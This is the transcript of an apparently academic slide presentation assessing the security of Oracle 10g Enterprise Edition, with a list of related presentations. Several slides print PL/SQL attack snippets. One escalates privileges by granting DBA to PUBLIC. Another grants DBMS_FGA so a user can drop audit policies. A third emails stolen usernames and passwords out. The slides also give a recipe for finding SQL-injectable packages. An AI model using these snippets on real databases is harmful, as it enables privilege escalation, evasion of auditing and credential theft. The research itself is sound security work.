Presentation is loading. Please wait.

Presentation is loading. Please wait.

10 g An Investigation Into The Security Of Oracle 10g Enterprise Edition Release 2 Researcher: Okelitse Nyathi Supervisor: Mr J Ebden.

Published byCharles Patman Modified over 10 years ago

Similar presentations

Presentation on theme: "10 g An Investigation Into The Security Of Oracle 10g Enterprise Edition Release 2 Researcher: Okelitse Nyathi Supervisor: Mr J Ebden."— Presentation transcript:

1 10 g An Investigation Into The Security Of Oracle 10g Enterprise Edition Release 2 Researcher: Okelitse Nyathi Supervisor: Mr J Ebden

2 10 g OUTLINE Problem statement Methodology Results Detecting a potential SQL Injection vulnerability Demo…slight change...more snapshots Conclusion Future work

3 10 g PROBLEM STATEMENT Claimed that Oracle is not safe by security researchers In 11/06, discovery of a new flaw called Cursor Snarfing by Litchfield Claim by Litchfield that Oracle had 34 unfixed flaws in 2006 whilst MS SQL Server had 0 Claim by Argeniss Information Security that this year alone Oracle has about 50 unfixed flaws including SQL Injection Reasons stated above and some other triggered the commencement of my project

4 10 g METHODOLOGY. AUTHENTICATION AUTHORISATION BACKGROUND AUDITING DATA SECURITY & PRIVACY DB SERVER APP SERVER CLIENT OID

5 10 g METHODOLOGY CONT… A thorough knowledge and scrutiny of the four security layers. Then find ways to break through these layers from the outer boundary to the pinnacle (in a good sense) As well as finding possible ways to avoid penetration through these security layers Finally make a well informed conclusion based upon the results.

6 10 g WHAT I FOUND… THE FOLLOWING SLIDES SHOW EXPLANATIONS AND SNAPSOTS OF MY FINDINGS

7 10 g AUTHENTICATION Oracle uses a very simple password hashing algorithm with a very weak salt Their algorithm is known in fine details, there are tools that imitate Oracle’s password hashing algorithm There are also tools that break Oracle’s password hashes giving clear texts password. Possible also to gain clear text passwords in Oracle using the password_verify_function, a stored procedure that monitors strength.

8 10 g AUTHENTICATION C0NT… Same hash Breaking the hash Oracle hash obtained

9 10 g AUTHORISATION Relatively easy to escalate privileges in Oracle from the minimum privilege to being the DBA. Most of this is achieved successfully through SQL Injection which is the main weakness Oracle uses VPD which monitors who has access to an object by adding the appropriate predicate to the query. Unfortunately this can easily be dropped by an attacker Oracle can be deceived by a low privileged user into exporting out whole database over the Internet by using OPS commands

10 10 g AUTHORISATION CONT… DECLARE MY_CURSOR NUMBER; RESULT NUMBER; BEGIN MY_CURSOR:= DBMS_SQL.OPEN_CURSOR; DBMS_SQL.PARSE (MY_CURSOR,'declare pragma autonomous_transaction; Begin execute immediate '‘GRANT DBA TO PUBLIC''; commit; end;’, 0); DBMS_OUTPUT.PUT_LINE ('Cursor value is:' || MY_CURSOR); END; / Cursor value is: 6 PL/SQL procedure successfully completed. Stand-alone subprogram with independent commands SQL Injection

11 10 g AUDITING This occurs transparently without the user suspecting anything Fine Grained Auditing is an excellent method used by Oracle to monitors access on objects rather than users. But just like VPD, easily by passed by hackers leaving no trace of an attack. Triggers can be used as well to audit, these too can be dropped by hackers.

12 10 g AUDITING CONT… CREATE OR REPLACE FUNCTION GAIN_DBMS_FGA RETURN NUMBER AUTHID CURRENT_USER AS PRAGMA AUTONOMOUS_TRANSACTION; BEGIN DBMS_OUTPUT.PUT_LINE('EXECUTED FLAW'); EXECUTE IMMEDIATE 'GRANT EXECUTE ON DBMS_FGA TO OXO'; RETURN 1; COMMIT; END; / Grant DBMS_FGA Dropping policy Auditing dropped

13 10 g DATA SECURITY & PRIVACY Oracle’s top security level Examples are checksums, TDE and wrappers but the last two have flaws TDE encrypts data as claimed but defeats its sole purpose of hiding data because clear data is visible. Oracle stores both clear and encrypted data together because zeroing(making it null) out text requires a lot of CPU cycles (optimisation) If an attacker gets hold of the disks then he has access to the data in it by mounting it on a similar OS.

14 10 g DATA SECURITY & PRIVACY CONT… Create test table Dump data in udump View data in udump

15 10 g DATA SECURITY & PRIVACY CONT… View data in udump Update udump Encrypt field

16 10 g DETECT SQL INJECTION VULNERABILITY Find out who has the DBA role in the database For each user in the list, search for packages created by user that have been granted to ‘public’, and not declared as ‘current user’ (thus definer) For each of the packages in the list, run the command ‘describe’ to find procedures and functions within that have ‘varchar2’ as a parameter. For each of the procedures or function, input four single quotes as input and note down those that return the error: ORA – 01756: Quoted string not properly terminated e.g.: Exec wksys.wk_qry.setsessionlang(‘’’’);

17 10 g DEMO…snapshots The demo is a combination of different kinds of hacks that break authentication, authorisation and data secrecy and privacy

18 10 g DEMO CONT… Change SYS’s password Perform SQL Injection

19 10 g DEMO CONT… Password stored in table Original password can not login

20 10 g DEMO CONT… PROCEDURE PWDHACK (USERNAME_IN VARCHAR2, VALUE_IN VARCHAR2) IS PRAGMA AUTONOMOUS_TRANSACTION; BEGIN SCOTT.SEMD_EMAIL(USERNAME_IN, VALUE_IN); COMMIT; END; BEGIN DIGITARRAY: = '0123456789'; Chararray: = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' Send username & password by email Email Received

21 10 g DEMO CONT… Replace password hash & delete it from table Current password hash

22 10 g DEMO CONT… Guess who’s logging in ? New password hash

23 10 g CONCLUSION Having gathered the results presented above and others not presented today, a conclusion was reached. It seems that all the layers presented by Oracle have got a security hole that allows data to be pinched by hackers. My conclusion is that Oracle as a database is not safe enough to store user data. Their major weakness is protecting against SQL Injection as well as using a weak password hashing algorithm. A lot of packages, stored procedures and functions have to be reviewed for SQL Injection.

24 10 g FUTURE WORK A security comparison between Oracle and another relational database e.g. Ms SQL Server Look into Oracle’s coding especially their “assembly code”, there is claim that Oracle has insecure op code that makes it unsafe as a database Oracle seems to be issuing a lot of patches every quota as high as 86 early this year in the first quota. This might be an interesting issue to look into.

25 10 g A Q & Q U E S T I O N S A N S W E R S

Download ppt "10 g An Investigation Into The Security Of Oracle 10g Enterprise Edition Release 2 Researcher: Okelitse Nyathi Supervisor: Mr J Ebden."

Similar presentations

Module XIV SQL Injection

Module XIV SQL Injection
MySQL Access Privilege System

MySQL Access Privilege System
An investigation into the security features offered by Oracle 10g Enterprise Edition Author: Keletso Nyathi Supervisor: Mr John Ebden Computer Science.

An investigation into the security features offered by Oracle 10g Enterprise Edition Author: Keletso Nyathi Supervisor: Mr John Ebden Computer Science.
An investigation into the security features of Oracle 10g R2 Enterprise Edition Supervisor: Mr J Ebden.

An investigation into the security features of Oracle 10g R2 Enterprise Edition Supervisor: Mr J Ebden.
Copyright © 2013, Oracle and/or its affiliates. All rights reserved. 1.

Copyright © 2013, Oracle and/or its affiliates. All rights reserved. 1.
Chapter 23 Database Security and Authorization Copyright © 2004 Pearson Education, Inc.

Chapter 23 Database Security and Authorization Copyright © 2004 Pearson Education, Inc.
Prligence Empowering Intelligence All About Fine Grained Access Control by Arup Nanda.

Prligence Empowering Intelligence All About Fine Grained Access Control by Arup Nanda.
Understand Database Security Concepts

Understand Database Security Concepts
How Did I Steal Your Database Mostafa

How Did I Steal Your Database Mostafa
Securing Oracle Databases CSS-DSG JTrumbo. Audit Recommendations -Make sure databases are current with patches. -Ensure all current default accounts &

Securing Oracle Databases CSS-DSG JTrumbo. Audit Recommendations -Make sure databases are current with patches. -Ensure all current default accounts &
Database Management System

Database Management System
Information System Security. Outline  Oracle Vulnerabilities  Oracle Security Assessment 2 Information System Security - Week 10.

Information System Security. Outline  Oracle Vulnerabilities  Oracle Security Assessment 2 Information System Security - Week 10.
Introduction The concept of “SQL Injection”

Introduction The concept of “SQL Injection”
Chapter 9 Auditing Database Activities

Chapter 9 Auditing Database Activities
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba.

NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
Database Connectivity Rose-Hulman Institute of Technology Curt Clifton.

Database Connectivity Rose-Hulman Institute of Technology Curt Clifton.
Dec 13 th CS555 presentation1 Yiwen Wang --“Securing the DB may be the single biggest action an organization can take to protect its assets” David C. Knox.

Dec 13 th CS555 presentation1 Yiwen Wang --“Securing the DB may be the single biggest action an organization can take to protect its assets” David C. Knox.
Oracle PL/SQL Injection David Litchfield. What is PL/SQL? Procedural Language / Structured Query Language Oracle’s extension to standard SQL Programmable.

Oracle PL/SQL Injection David Litchfield. What is PL/SQL? Procedural Language / Structured Query Language Oracle’s extension to standard SQL Programmable.
Database Security and Auditing: Protecting Data Integrity and Accessibility Chapter 3 Administration of Users.

Database Security and Auditing: Protecting Data Integrity and Accessibility Chapter 3 Administration of Users.
{ Code Injection Cable Johnson.  Overview  Common Injection Types  Developer Prevention Code Injection.

{ Code Injection Cable Johnson.  Overview  Common Injection Types  Developer Prevention Code Injection.

Similar presentations

Ads by Google